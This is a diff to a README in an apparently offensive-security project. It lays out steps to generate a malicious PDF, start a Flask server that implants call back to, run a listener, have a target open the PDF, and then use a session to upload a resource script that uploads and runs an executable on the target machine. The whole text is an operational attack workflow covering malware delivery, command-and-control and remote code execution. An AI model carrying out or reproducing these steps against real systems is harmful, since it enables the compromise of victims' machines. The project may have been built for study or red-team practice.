ehsu4220/CyberEffects_IPDIM/README.md

           ./generate_malicious_pdf.sh

+2. Start flask server that is responsible for communicating with implants

+          Make note of the IP and port that the flask server is running on so that the implants know where to communicate back to

-2. Start listener by running the listener.sh script
+3. Start listener by running the listener.sh script

           chmod +x listener.sh

           ./listener.sh

+4. Download and open the malicious PDF on the target machine

-3. Upload the upload_exe.rc file to the target machine via session
+5. Upload the upload_exe.rc file to the target machine via session

           sessions -i 1

           upload upload_exe.rc

-4. Run the resource script in order to upload and run the executable
+6. Run the resource script in order to upload and run the executable

           resource upload_exe.rc